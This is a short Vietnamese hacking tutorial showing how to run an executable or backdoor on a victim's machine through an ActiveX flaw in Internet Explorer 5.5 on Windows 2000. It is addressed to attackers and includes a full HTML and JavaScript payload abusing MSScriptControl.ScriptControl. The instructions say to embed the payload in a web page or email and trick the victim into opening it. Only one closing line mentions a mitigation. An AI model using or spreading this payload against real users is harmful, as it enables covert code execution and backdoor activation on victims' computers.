Giới thiệu :
• Bạn đã cài được backdoor vào victim hay muốn chạy 1 file nào đó trên máy của victim ?
• Trong khi visit website hay check mail thì bạn có thể chạy 1 file mà bạn biết , ví dụ : notepad.exe ngay trên Browser
• Test trên IE 5.5 Windows 2000
• Bug này là bug của ActiveX object "MSScriptControl.ScriptControl" bạn có thể xem thêm nhiều điều ở trong : C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat.
Tiến hành
• Chắc chắn rằng victim dùng IE 5.5 Windows 2000 !!
• Tạo một file .html có mã như sau :
<html>
<h2>
Noi dung website
</h2>
<script>
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObject("c:/ten_file_can_chay.exe(hay gi do')","htmlfile")');
setTimeout("alert(x.body.outerHTML);",2000);
</script>
</html>
• Nhúng mã nguồn trên vào Website hay email, sau đó nhử cho victim kích hoạt
• Ðể khắc phục bạn cần bỏ ActiveX đí hay tốt nhất là không dùng IE nữa (ý kiến hay)
